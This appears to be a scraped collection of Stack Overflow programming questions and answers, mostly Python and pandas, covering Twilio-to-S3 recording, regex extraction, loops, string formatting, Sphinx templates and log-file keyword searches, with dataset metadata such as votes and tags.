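        df = df.pivot('observation_date', 'geography', m).reset_index()
        df['observation_date'] = pd.to_datetime(df['observation_date'], utc=False).dt.date
        df = df.sort_values(by='observation_date', ascending=True)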
Q: How to integrate Twilio's Voice API service with AWS S3 Storage? I'm trying to create a short program that calls a user's number and records the conversation using Twilio and send the recording to an S3 bucket Here's a link that does it to a dropbox instead of an S3: https://www.twilio.com/blog/recording-saving-outbound-voice-calls-python-twilio-dropbox Here's the code I have so far that allows me to call and recorded conversations go to Twilio's online storage: call = client.calls.create( record=True, url='http://demo.twilio.com/docs/voice.xml', to='+15558889988', from_='+18889992222' ) print(call.sid) A: Twillio has inbuilt mechanism to do it, any specific use case you want to do it. https://www.twilio.com/blog/announcing-external-aws-s3-storage-support-for-voice-recordings A: When you create the call you can also create a webhook that tells you when the recording is ready. When you then receive the webhook you can get the file and send it to S3. ... record=True, recording_status_callback=callbackURL+"/recordings", recording_status_callback_event=["completed"], ...
How to integrate Twilio's Voice API service with AWS S3 Storage?
I'm trying to create a short program that calls a user's number and records the conversation using Twilio and send the recording to an S3 bucket Here's a link that does it to a dropbox instead of an S3: https://www.twilio.com/blog/recording-saving-outbound-voice-calls-python-twilio-dropbox Here's the code I have so far that allows me to call and recorded conversations go to Twilio's online storage: call = client.calls.create( record=True, url='http://demo.twilio.com/docs/voice.xml', to='+15558889988', from_='+18889992222' ) print(call.sid)
[ "Twillio has inbuilt mechanism to do it, any specific use case you want to do it. https://www.twilio.com/blog/announcing-external-aws-s3-storage-support-for-voice-recordings\n", "When you create the call you can also create a webhook that tells you when the recording is ready. When you then receive the webhook you can get the file and send it to S3.\n...\n record=True,\n recording_status_callback=callbackURL+\"/recordings\",\n recording_status_callback_event=[\"completed\"],\n...\n\n" ]
[ 1, 1 ]
[]
[]
[ "amazon_s3", "amazon_web_services", "flask", "python", "twilio" ]
stackoverflow_0074553752_amazon_s3_amazon_web_services_flask_python_twilio.txt
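To make the webhook route from the second answer above concrete, here is a hedged sketch of a Flask endpoint that receives Twilio's recording-status callback, downloads the audio, and uploads it to S3 with boto3. The bucket name and route are placeholders, and the RecordingUrl / RecordingSid form fields plus the basic-auth download are based on Twilio's documented callback behaviour, so verify them against the current docs; the external S3 storage option linked in the first answer avoids this code entirely.

import os
import boto3
import requests
from flask import Flask, request

app = Flask(__name__)
s3 = boto3.client("s3")
BUCKET = "my-recordings-bucket"  # placeholder

@app.route("/recordings", methods=["POST"])
def recording_ready():
    recording_url = request.form["RecordingUrl"]   # sent by Twilio when the recording completes
    recording_sid = request.form["RecordingSid"]
    # Recording media may require your account SID / auth token as HTTP basic auth.
    audio = requests.get(recording_url + ".mp3",
                         auth=(os.environ["TWILIO_ACCOUNT_SID"], os.environ["TWILIO_AUTH_TOKEN"]))
    s3.put_object(Bucket=BUCKET, Key=f"{recording_sid}.mp3", Body=audio.content)
    return ("", 204)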
Q: Function to remove a part of a string before a capital letter in Pandas Series I have a dataframe that includes a column ['locality_name'] with names of villages, towns, cities. Some names are written like "town of Hamilton", some like "Hamilton", some like "city of Hamilton" etc. As such, it's hard to count unique values etc. My goal is to leave the names only. I want to write a function that removes the part of a string till the capital letter and then apply it to my dataframe. That's what I tried: import re def my_slicer(row): """ Returns a string with the name of locality """ return re.sub('ABCDEFGHIKLMNOPQRSTVXYZ','', row['locality_name']) raw_data['locality_name_only'] = raw_data.apply(my_slicer, axis=1) I excpected it to return a new column with the names of places. Instead, nothing changed - ['locality_name_only'] has the same values as in ['locality_name']. A: You can use pandas.Series.str.extract. For the example : ser = pd.Series(["town of Hamilton", "Hamilton", "city of Hamilton"]) ser_2= ser.str.extract("([A-Z][a-z]+-?\w+)") In your case, use : raw_data['locality_name_only'] = raw_data['locality_name'].str.extract("([A-Z][a-z]+-?\w+)") # Output : print(ser_2) 0 0 Hamilton 1 Hamilton 2 Hamilton A: I would use str.replace and phrase the problem as removing all non uppercase words: raw_data["locality_name_only"] = df["locality_name"].str.replace(r'\s*\b[a-z]\w*\s*', ' ', regex=True).str.strip()
Function to remove a part of a string before a capital letter in Pandas Series
I have a dataframe that includes a column ['locality_name'] with names of villages, towns, and cities. Some names are written like "town of Hamilton", some like "Hamilton", some like "city of Hamilton" etc. As such, it's hard to count unique values etc. My goal is to keep the names only. I want to write a function that removes the part of a string before the capital letter and then apply it to my dataframe. That's what I tried: import re def my_slicer(row): """ Returns a string with the name of locality """ return re.sub('ABCDEFGHIKLMNOPQRSTVXYZ','', row['locality_name']) raw_data['locality_name_only'] = raw_data.apply(my_slicer, axis=1) I expected it to return a new column with the names of places. Instead, nothing changed - ['locality_name_only'] has the same values as in ['locality_name'].
[ "You can use pandas.Series.str.extract. For the example :\nser = pd.Series([\"town of Hamilton\", \"Hamilton\", \"city of Hamilton\"])\nser_2= ser.str.extract(\"([A-Z][a-z]+-?\\w+)\")\n\nIn your case, use :\nraw_data['locality_name_only'] = raw_data['locality_name'].str.extract(\"([A-Z][a-z]+-?\\w+)\")\n\n# Output :\nprint(ser_2)\n\n 0\n0 Hamilton\n1 Hamilton\n2 Hamilton\n\n", "I would use str.replace and phrase the problem as removing all non uppercase words:\nraw_data[\"locality_name_only\"] = df[\"locality_name\"].str.replace(r'\\s*\\b[a-z]\\w*\\s*', ' ', regex=True).str.strip()\n\n" ]
[ 0, 0 ]
[]
[]
[ "pandas", "python", "python_re" ]
stackoverflow_0074575151_pandas_python_python_re.txt
Q: Trying to add a sentinel that is not a number (Python) (I am new to Python so forgive me in advance) I have to write a program that calculates the total of integers from 1 to the user input. So if I input 4, it would add 1+2+3+4. I also added an argument that makes a number that is less than 1 print "invalid number". I am stuck on adding a sentinel that is a letter. Thank you value = input("Enter a number or press J to terminate: ") if value < 1: print("Invalid number") else: i = 1 while value > 1: i = i + value value = value - 1 print(i) This is the code that I tried to do: value = input("Enter a number or J to finish: ") if value < 1: print("Invalid number") while value ! = "J": i = float(value) else: i = 1 while value > 1: i = i + value value = value - 1 print(i) value = input("Enter a number or J to finish: ") Error when J or any number is inputted, '<' not supported between instances of 'str' and 'int'. A: Beginning of an answer. value = input("Enter a number or J to finish: ") while value ! = "J": i = float(value) # a placeholder for future code print(value) # There is a lot of possible code to achieve the goal. A: the function input() always stores the input as string data-type so if you give input as 4 means it will consider the 4 as a string not integer now with this in mind now try: value = input("Enter a number or J to finish: ") if value > 1: print("BOTH DATA TYPES ARE SAME ") value = 4 now we are comparing 4 => "string" with 1 => "int", it's not possible to compare "integer" with "string" so the error occurs. if you want to get input as int then use the following int(input("")) I hope it'll be helpful, thank you
Trying to add a sentinel that is not a number (Python)
(I am new to Python so forgive me in advance) I have to write a program that calculates the total of integers from 1 to the user input. So if I input 4, it would add 1+2+3+4. I also added an argument that makes a number that is less than 1 print "invalid number". I am stuck on adding a sentinel that is a letter. Thank you value = input("Enter a number or press J to terminate: ") if value < 1: print("Invalid number") else: i = 1 while value > 1: i = i + value value = value - 1 print(i) This is the code that I tried to do: value = input("Enter a number or J to finish: ") if value < 1: print("Invalid number") while value ! = "J": i = float(value) else: i = 1 while value > 1: i = i + value value = value - 1 print(i) value = input("Enter a number or J to finish: ") Error when J or any number is inputted, '<' not supported between instances of 'str' and 'int'.
[ "Beginning of an answer.\nvalue = input(\"Enter a number or J to finish: \")\nwhile value ! = \"J\":\n i = float(value)\n# a placeholder for future code\nprint(value)\n# There is a lot of possible code to achieve the goal.\n\n", "the function input() always stores the input as string data-type\nso if you give input as 4 means it will consider the 4 as a string not integer\nnow with this in mind now try:\nvalue = input(\"Enter a number or J to finish: \")\nif value > 1:\n print(\"BOTH DATA TYPES ARE SAME \")\n\nvalue = 4\nnow we are comparing 4 => \"string\" with 1 => \"int\", it's not possible to compare \"integer\" with \"string\" so the error occurs.\nif you want to get input as int then use the following int(input(\"\"))\nI hope it'll be helpful, thank you\n" ]
[ 0, 0 ]
[]
[]
[ "if_statement", "python", "sentinel", "while_loop" ]
stackoverflow_0074575127_if_statement_python_sentinel_while_loop.txt
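Putting the two answers above together, a complete sketch of the sentinel-controlled loop: keep the input as a string, stop on "J", and only convert to int once the sentinel check has passed, which matches the behaviour described in the question:

value = input("Enter a number or J to finish: ")
while value != "J":            # compare strings before any conversion
    number = int(value)        # safe to convert now that we know it is not the sentinel
    if number < 1:
        print("Invalid number")
    else:
        total = 0
        for i in range(1, number + 1):   # 1 + 2 + ... + number
            total += i
        print(total)
    value = input("Enter a number or J to finish: ")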
Q: seperate string number ranges in pandas df I have a df which looks like this Type range Mike 10..13|7|8| Ni 3..4 NANA 2|1|6 and desired output should look like this Type range Mike 10 Mike 11 Mike 12 Mike 13 Mike 7 Mike 8 Nico 3 Nico 4 NANA 2 NANA 1 NANA 6 so, Totaling column presenet the multiple values per Type. range values are presnted with two number seperated by two .. and one value (with no range) is presented between two | | A: Assuming that your ranges are inclusive, which I assume because your '3..4' translates to a row with 3 and a row with 4, and assuming that you forgot to put Mike 14 and Mike 15 in your example output, I found the following solution: import pandas as pd def parse_str(s): numbers = [] for v in s.rstrip('|').split('|'): if v.isdigit(): numbers.append(int(v)) else: start, end = v.split('..') numbers.extend(list(range(int(start), int(end)+1))) return pd.Series(numbers) df.index = df['Type'] dfnew = df['range'].apply(parse_str).stack().reset_index(level=0).rename(columns={0: 'range'}) We write a function that parses the string, which means splitting the string by | and converting the numbers to integers if the string is already a number. Otherwise, it's a range so we split again by .. and create a list with all the numbers in the range. In the end, we return a pd.Series containing all the numbers from the string. Then, we apply that function to the column with df['range'].apply and stack the result. To assure we still keep the names, we have to first set it as the index of the dataframe. A: You can do # split by '|' and explode df = df.assign(range=df['range'].str.split('|')).explode('range') # get the range(i, j) if the string has '..' df['range'] = df['range'].apply(lambda r: range(int(r.split('..')[0]), int(r.split('..')[1])) if (len(r.split('..')) == 2) else r) # explode df = df.explode('range') df Type range 0 Mike 10 0 Mike 11 0 Mike 12 0 Mike 13 0 Mike 14 0 Mike 7 0 Mike 8 1 Ni 3 2 NANA 2 2 NANA 1 2 NANA 6
separate string number ranges in pandas df
I have a df which looks like this Type range Mike 10..13|7|8| Ni 3..4 NANA 2|1|6 and the desired output should look like this Type range Mike 10 Mike 11 Mike 12 Mike 13 Mike 7 Mike 8 Nico 3 Nico 4 NANA 2 NANA 1 NANA 6 So, the Totaling column presents the multiple values per Type. Range values are presented as two numbers separated by two dots (..) and a single value (with no range) is presented between two | characters.
[ "Assuming that your ranges are inclusive, which I assume because your '3..4' translates to a row with 3 and a row with 4, and assuming that you forgot to put Mike 14 and Mike 15 in your example output, I found the following solution:\nimport pandas as pd\n\ndef parse_str(s):\n numbers = []\n for v in s.rstrip('|').split('|'):\n if v.isdigit():\n numbers.append(int(v))\n else:\n start, end = v.split('..')\n numbers.extend(list(range(int(start), int(end)+1)))\n return pd.Series(numbers)\n\ndf.index = df['Type']\ndfnew = df['range'].apply(parse_str).stack().reset_index(level=0).rename(columns={0: 'range'})\n\nWe write a function that parses the string, which means splitting the string by | and converting the numbers to integers if the string is already a number. Otherwise, it's a range so we split again by .. and create a list with all the numbers in the range. In the end, we return a pd.Series containing all the numbers from the string.\nThen, we apply that function to the column with df['range'].apply and stack the result. To assure we still keep the names, we have to first set it as the index of the dataframe.\n", "You can do\n# split by '|' and explode\ndf = df.assign(range=df['range'].str.split('|')).explode('range')\n\n# get the range(i, j) if the string has '..'\ndf['range'] = df['range'].apply(lambda r: range(int(r.split('..')[0]), int(r.split('..')[1])) if (len(r.split('..')) == 2) else r)\n\n# explode\ndf = df.explode('range')\ndf\n\n Type range\n0 Mike 10\n0 Mike 11\n0 Mike 12\n0 Mike 13\n0 Mike 14\n0 Mike 7\n0 Mike 8\n1 Ni 3\n2 NANA 2\n2 NANA 1\n2 NANA 6\n\n" ]
[ 0, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575084_pandas_python.txt
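One caveat on the second answer above: range(start, stop) excludes the upper bound, so '10..13' would expand to 10-12 rather than the 10-13 shown in the expected output. A small corrected sketch, assuming the ranges are meant to be inclusive as the first answer does:

import pandas as pd

df = pd.DataFrame({"Type": ["Mike", "Ni", "NANA"],
                   "range": ["10..13|7|8|", "3..4", "2|1|6"]})

def expand(token):
    # "10..13" -> [10, 11, 12, 13]; "7" -> [7]
    if ".." in token:
        start, end = token.split("..")
        return list(range(int(start), int(end) + 1))   # +1 keeps the upper bound
    return [int(token)]

out = (df.assign(range=df["range"].str.strip("|").str.split("|"))
         .explode("range")
         .assign(range=lambda d: d["range"].map(expand))
         .explode("range")
         .reset_index(drop=True))
print(out)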
Q: Doing math with numbers in a list i want to be able to add, subtract, divide, multiply etc with integers in a list and in order. I know you can use sum() to add, but i also want to be able to subtract, etc in order... so i tried making a for loop idk if thats the right thing to do, but it doesn't give me the right output and it really confuses me because it really seems like it should work. I was wondering if anyone knows how to fix this or explain why its not giving me the same output as i expected. my_list = [100, 15, 3] for i in my_list: i -= i print(i) # 100 - 15 - 3 = 82 # Wanted output: 82 # Actual output: 0 my_list = [100, 15] for i in my_list: i += i print(i) # 100 + 15 = 115 # Wanted output: 115 # Actual output: 30 A: There are two main issues with your code: i can't be your loop variable and the sum, because it will be overwritten all the time. So make two variables. Your first task is different from the second. The sum is easy: take all the values of the list and add them, so the order is irrelevant. For your subtraction it's different because you have to take the first value and subtract all others, so it's basically +100-15-3, which means that also the order of the values in the list matter. There are more elegant ways to solve it, but for the beginning this should be better to understand. my_list = [100, 15, 3] my_difference = my_list[0] #initialize with the first value of your list my_list_sub = my_list[1:] #make a new list with the remaining numbers for val in my_list_sub: my_difference=my_difference-val print(my_difference) my_list = [100, 15] my_sum = 0 #initialize your sum with 0 for val in my_list: my_sum=my_sum+val print(my_sum) A: As others already pointed out: The "running"/temporary variable is overwritten in every loop. You can try this out with a simple test: for entry in [0, 'a', 13.37]: print(entry) It's always a good idea of trying out what happens in simple cases to learn what is going on. But your idea of solving this with a loop is absolutely fine. If you want to re-use this functionallity later, it is also nice to wrap that in a function. Assume integer values my_values = [100, 50, 123, 51, 124, 121] in the following examples. Lets first tacle the sum. def calculate_sum(values: list) -> int: result = 0 for entry in values: result += entry return result Check that it does what we want with print(calculate_sum(my_values)) print(sum(my_values)) Now difference is 'almost' like summing up, but you want to sum up all values but the first one, and then compute the difference to the first one (a-b-c-d = a-(b+c+d)). Great, that we have already a method for summing up stuff, so we could simply do def calculate_difference(values: list) -> int: first, *other = values return first - calculate_sum(other) Note the *-marker in front of the other variable. When assigning a list two multiple variables, they are "unpacked" by python. Thus a, b, c = [0, 1, 2] would assign 0 to a and so on. However, when we do a, b = [0, 1, 2], then python complains because there are too many variables to unpack in the list (3 > 2). With the asterisk we simply tell python to put all other values, not used so far, into this special variable again. a, b, *rest = [1, 2, 3, 4, 5, 6] is also possible. Ok, computing the product is as easy as summing up, just replace += by *= in the method. And for the quotient we can do the same as for the difference, since a * 1/b * 1/c * 1/d = a / (b*c*d). However, note that if the divisor is zero, python will raise an Error DivisionByZero, as this is not legal. 
Also, the result of the method is float and no longer int.
Doing math with numbers in a list
i want to be able to add, subtract, divide, multiply etc with integers in a list and in order. I know you can use sum() to add, but i also want to be able to subtract, etc in order... so i tried making a for loop idk if thats the right thing to do, but it doesn't give me the right output and it really confuses me because it really seems like it should work. I was wondering if anyone knows how to fix this or explain why its not giving me the same output as i expected. my_list = [100, 15, 3] for i in my_list: i -= i print(i) # 100 - 15 - 3 = 82 # Wanted output: 82 # Actual output: 0 my_list = [100, 15] for i in my_list: i += i print(i) # 100 + 15 = 115 # Wanted output: 115 # Actual output: 30
[ "There are two main issues with your code:\n\ni can't be your loop variable and the sum, because it will be overwritten all the time. So make two variables.\nYour first task is different from the second. The sum is easy: take all the values of the list and add them, so the order is irrelevant. For your subtraction it's different because you have to take the first value and subtract all others, so it's basically +100-15-3, which means that also the order of the values in the list matter.\n\nThere are more elegant ways to solve it, but for the beginning this should be better to understand.\nmy_list = [100, 15, 3]\n\n\nmy_difference = my_list[0] #initialize with the first value of your list\nmy_list_sub = my_list[1:] #make a new list with the remaining numbers\n\nfor val in my_list_sub:\n my_difference=my_difference-val\nprint(my_difference)\n\n\nmy_list = [100, 15]\nmy_sum = 0 #initialize your sum with 0\n\nfor val in my_list:\n my_sum=my_sum+val\nprint(my_sum)\n\n\n\n", "As others already pointed out: The \"running\"/temporary variable is overwritten in every loop. You can try this out with a simple test:\nfor entry in [0, 'a', 13.37]:\n print(entry) \n\nIt's always a good idea of trying out what happens in simple cases to learn what is going on.\nBut your idea of solving this with a loop is absolutely fine. If you want to re-use this functionallity later, it is also nice to wrap that in a function.\nAssume integer values my_values = [100, 50, 123, 51, 124, 121] in the following examples.\nLets first tacle the sum.\ndef calculate_sum(values: list) -> int:\n result = 0\n for entry in values:\n result += entry\n return result\n\nCheck that it does what we want with\nprint(calculate_sum(my_values))\nprint(sum(my_values))\n\nNow difference is 'almost' like summing up, but you want to sum up all values but the first one, and then compute the difference to the first one (a-b-c-d = a-(b+c+d)). Great, that we have already a method for summing up stuff, so we could simply do\ndef calculate_difference(values: list) -> int:\n first, *other = values\n return first - calculate_sum(other)\n\nNote the *-marker in front of the other variable. When assigning a list two multiple variables, they are \"unpacked\" by python. Thus a, b, c = [0, 1, 2] would assign 0 to a and so on. However, when we do a, b = [0, 1, 2], then python complains because there are too many variables to unpack in the list (3 > 2). With the asterisk we simply tell python to put all other values, not used so far, into this special variable again. a, b, *rest = [1, 2, 3, 4, 5, 6] is also possible.\n\nOk, computing the product is as easy as summing up, just replace += by *= in the method. And for the quotient we can do the same as for the difference, since a * 1/b * 1/c * 1/d = a / (b*c*d). However, note that if the divisor is zero, python will raise an Error DivisionByZero, as this is not legal. Also, the result of the method is float and no longer int.\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "python" ]
stackoverflow_0074574492_for_loop_python.txt
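To round off the second answer above: the product and quotient helpers it describes but does not spell out, plus the functools.reduce shortcut that performs the same left-to-right folding. A sketch; the quotient version raises ZeroDivisionError if the product of the later values is 0, as noted above:

from functools import reduce
import operator

def calculate_product(values: list) -> int:
    result = 1
    for entry in values:
        result *= entry
    return result

def calculate_quotient(values: list) -> float:
    first, *other = values
    return first / calculate_product(other)

my_values = [100, 50, 123, 51, 124, 121]
print(calculate_product(my_values))
print(calculate_quotient(my_values))
print(reduce(operator.sub, [100, 15, 3]))   # 100 - 15 - 3 = 82, same as the loop version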
Q: Why Python format function is not working? In python I wrote: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) But I get: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) TypeError: non-empty format string passed to object.__format__ why is that? A: Don't wrap the format parameters in a list: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: # here ↓ and here ↓ print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2])) output: A B C Even better, you could use parameter expansion: for asset in list_of_assets: print('{:15} {:30} {:30}'.format(*asset)) A: The error came because you passed a list argument to the format function. Pass individual elements of the list instead. Your code should be like this: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2])) A: Use this code list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format(asset[0],asset[1],asset[2]))
Why Python format function is not working?
In python I wrote: list_of_assets = [] list_of_assets.append(('A', 'B', 'C')) for asset in list_of_assets: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) But I get: print('{:15} {:30} {:30}'.format([asset[0], asset[1], asset[2]])) TypeError: non-empty format string passed to object.__format__ why is that?
[ "Don't wrap the format parameters in a list:\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n # here ↓ and here ↓\n print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2]))\n\noutput:\nA B C \n\nEven better, you could use parameter expansion:\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(*asset))\n\n", "The error came because you passed a list argument to the format function. Pass individual elements of the list instead.\nYour code should be like this:\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(asset[0], asset[1], asset[2]))\n\n", "Use this code\nlist_of_assets = []\nlist_of_assets.append(('A', 'B', 'C'))\nfor asset in list_of_assets:\n print('{:15} {:30} {:30}'.format(asset[0],asset[1],asset[2]))\n\n" ]
[ 2, 1, 0 ]
[]
[]
[ "format", "python", "python_3.x" ]
stackoverflow_0070582950_format_python_python_3.x.txt
Q: How to modify html title separator in Sphinx doc generator By default it seems to what to use a long dash '--' as the separator between page title and overall site html_title that's set in the config.py file. We'd like to change this to a '|' character instead. I can add a block to the layout.html template to modify the title I'm just unsure of what to actually write for that. I want it to be 'page_title | html_title' in the title tags across the site. A: The em dash (&#8212;) comes from the layout.html template: {%- if not embedded and docstitle %} {%- set titlesuffix = " &#8212; "|safe + docstitle|e %} {%- else %} {%- set titlesuffix = "" %} {%- endif %} The value of titlesuffix is used a bit further down in the template: {%- block htmltitle %} <title>{{ title|striptags|e }}{{ titlesuffix }}</title> {%- endblock %} To customize: Ensure that you have templates_path = ['_templates'] in conf.py. Create a file called layout.html in the _templates directory. In layout.html, add the following: {% extends "!layout.html" %} {%- set customtitlesuffix = " | "|safe + docstitle|e %} {%- block htmltitle %} <title>{{ title|striptags|e }}{{ customtitlesuffix }}</title> {%- endblock %} See also https://www.sphinx-doc.org/en/master/templating.html.
How to modify html title separator in Sphinx doc generator
By default it seems to want to use a long dash '--' as the separator between the page title and the overall site html_title that's set in the conf.py file. We'd like to change this to a '|' character instead. I can add a block to the layout.html template to modify the title; I'm just unsure of what to actually write for that. I want it to be 'page_title | html_title' in the title tags across the site.
[ "The em dash (&#8212;) comes from the layout.html template:\n{%- if not embedded and docstitle %}\n{%- set titlesuffix = \" &#8212; \"|safe + docstitle|e %}\n{%- else %}\n{%- set titlesuffix = \"\" %}\n{%- endif %}\n\nThe value of titlesuffix is used a bit further down in the template:\n{%- block htmltitle %}\n<title>{{ title|striptags|e }}{{ titlesuffix }}</title>\n{%- endblock %}\n\nTo customize:\n\nEnsure that you have templates_path = ['_templates'] in conf.py.\n\nCreate a file called layout.html in the _templates directory.\n\nIn layout.html, add the following:\n{% extends \"!layout.html\" %}\n\n{%- set customtitlesuffix = \" | \"|safe + docstitle|e %}\n\n{%- block htmltitle %}\n<title>{{ title|striptags|e }}{{ customtitlesuffix }}</title>\n{%- endblock %}\n\n\n\nSee also https://www.sphinx-doc.org/en/master/templating.html.\n" ]
[ 1 ]
[]
[]
[ "documentation", "html", "python", "python_sphinx" ]
stackoverflow_0074564451_documentation_html_python_python_sphinx.txt
Q: Count the frequency that a value occurs in a dataframe (multiple column) I want to count the frequency of a value that are same in 2 column, also adding a column at the end that display the counting number & delete the first cloumn. The dataframe I have | Column A | Column B | Column C | | -------- | -------- | -------- | | Column A | Cat | Fish | | Column A | Cat | Apple | | Column A | Cat | Apple | | Column A | Dog | Lemon | | Column A | Dog | Fish | | Column A | Dog | Fish | The expected outcome is like | Column A | Column B | Column C | | -------- | -------- | -------- | | Cat | Fish | 1 | | Cat | Apple | 2 | | Dog | Lemon | 1 | | Dog | Fish | 2 | I have tried the df['Column B'].value_counts() But I don't know to handle 2 cloumn at the same time. A: You can use GroupBy.count : out = ( df.groupby(["Column B", "Column C"], as_index=False, sort=False) ["Column A"].count() ) # Output : print(out) Column B Column C Column A 0 Cat Fish 1 1 Cat Apple 2 2 Dog Lemon 1 3 Dog Fish 2
Count the frequency that a value occurs in a dataframe (multiple column)
I want to count the frequency of values that are the same across 2 columns, also adding a column at the end that displays the count and deleting the first column. The dataframe I have | Column A | Column B | Column C | | -------- | -------- | -------- | | Column A | Cat | Fish | | Column A | Cat | Apple | | Column A | Cat | Apple | | Column A | Dog | Lemon | | Column A | Dog | Fish | | Column A | Dog | Fish | The expected outcome is like | Column A | Column B | Column C | | -------- | -------- | -------- | | Cat | Fish | 1 | | Cat | Apple | 2 | | Dog | Lemon | 1 | | Dog | Fish | 2 | I have tried df['Column B'].value_counts(), but I don't know how to handle 2 columns at the same time.
[ "You can use GroupBy.count :\nout = (\n df.groupby([\"Column B\", \"Column C\"],\n as_index=False, sort=False)\n [\"Column A\"].count()\n )\n\n# Output :\nprint(out)\n Column B Column C Column A\n0 Cat Fish 1\n1 Cat Apple 2\n2 Dog Lemon 1\n3 Dog Fish 2\n\n" ]
[ 1 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575361_pandas_python.txt
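Two equivalent alternatives for the entry above that avoid naming a third column just to count: groupby(...).size() and DataFrame.value_counts (the latter is available in pandas 1.1 and later). A sketch, assuming df holds the question's data:

out = (df.groupby(["Column B", "Column C"], sort=False)
         .size()
         .reset_index(name="count"))

# or, with pandas >= 1.1:
out2 = (df.value_counts(subset=["Column B", "Column C"], sort=False)
          .reset_index(name="count"))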
Q: Python - Search a list of a group strings in text file I want to search a list of group of strings inside a text file (.txt or .log). it must include group A or B (or CDE..). group A OR B each words need in the same line but not near by. (eg. ["123456", "Login"] or ["123457", "Login"] if in the same line then save it to a new txt file. Some of example output line: 20221110,1668057560.965,AE111,123457,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221110,1668057560.965,AE112,123458,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221111,1668057560.965,AE113,123458,0,"Action=Order,XXX,XXX",XXX,XXX below is my code: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] keep_phrases1 = ["123456", "Login"] keep_phrases2 = ["123457", "Login"] pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrases1]) pat = re.compile(r"\b" + pat + r"\b") pat2 = r"\b.*?\b".join([re.escape(word) for word in keep_phrases2]) pat2 = re.compile(r"\b" + pat2 + r"\b") print(pat2,pat) if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: found1 = pat.search(line) found2 = pat2.search(line) if found1 or found2: with open(outfile, "a") as wf: wf.write(line) It's works for me but not easy to add more group of words. And I think the code is not good for understand? My problems is How can I simplify the code? How can I easier to add other group to search? e.g. ["123458", "Login"] ["123456", "order"] ["123457", "order"] A: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] All keep_phrases in a container, I choose a dictionary but since they are identified by order, it could have been a list: keep_phrases = {'keep_phrases1': ["123456", "Login"], 'keep_phrases2':["123457", "Login"]} # Alternative, a list would work: # keep_phrases = [["123456", "Login"], ["123457", "Login"]] Now let's generate a list with the compiled patterns: def compile_pattern(keep_phrase): pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrase]) pat = re.compile(r"\b" + pat + r"\b") return pat patterns = [compile_pattern(keep_phrases[keep_phrase]) for keep_phrase in keep_phrases.keys()] # if keep_phrases had been a list, we would do # patterns = [compile_pattern(keep_phrase) for keep_phrase in keep_phrases] Finally, we look for matches for every pattern and if we get any finding, we write to file. if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: findings = [pat.search(line) for pat in patterns] # can do this because there's a list with patterns if any(findings): with open(outfile, "a") as wf: wf.write(line) A: Try, this. I read the whole file in a string to make code fast and readable, findall will return a list with all matching lines for the file. 
If memory is a problem the pattern also works on individual lines: import re file_list=["sit.txt"] keep_phrases=[["123456", "Login"],["123457", "Login"]] pat = [r"(?:.*?(?:" + p1 + r"\b.*?"+p2+r".*?(?:\n|$)))" for p1,p2 in keep_phrases] pat= r"|".join(pat) for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: text=f.read() print(re.findall(pat,text)) A: Without regex def match_words(line, words): return all(word in words for word in line) with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: split_line = line.split(",") if any( match_words(split_line , word) for word in [keep_phrases1, keep_phrases2]): with open(outfile, "a") as wf: wf.write(line)
Python - Search a list of a group strings in text file
I want to search a list of group of strings inside a text file (.txt or .log). it must include group A or B (or CDE..). group A OR B each words need in the same line but not near by. (eg. ["123456", "Login"] or ["123457", "Login"] if in the same line then save it to a new txt file. Some of example output line: 20221110,1668057560.965,AE111,123457,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221110,1668057560.965,AE112,123458,0,"Action=Account Login,XXX,XXX",XXX,XXX 20221111,1668057560.965,AE113,123458,0,"Action=Order,XXX,XXX",XXX,XXX below is my code: import os, re path = "Log\\" file_list = [path + f for f in os.listdir(path) if f.endswith('.log')] keep_phrases1 = ["123456", "Login"] keep_phrases2 = ["123457", "Login"] pat = r"\b.*?\b".join([re.escape(word) for word in keep_phrases1]) pat = re.compile(r"\b" + pat + r"\b") pat2 = r"\b.*?\b".join([re.escape(word) for word in keep_phrases2]) pat2 = re.compile(r"\b" + pat2 + r"\b") print(pat2,pat) if len(file_list) != 0: for infile in sorted(file_list): with open(infile, encoding="latin-1") as f: f = f.readlines() for line in f: found1 = pat.search(line) found2 = pat2.search(line) if found1 or found2: with open(outfile, "a") as wf: wf.write(line) It's works for me but not easy to add more group of words. And I think the code is not good for understand? My problems is How can I simplify the code? How can I easier to add other group to search? e.g. ["123458", "Login"] ["123456", "order"] ["123457", "order"]
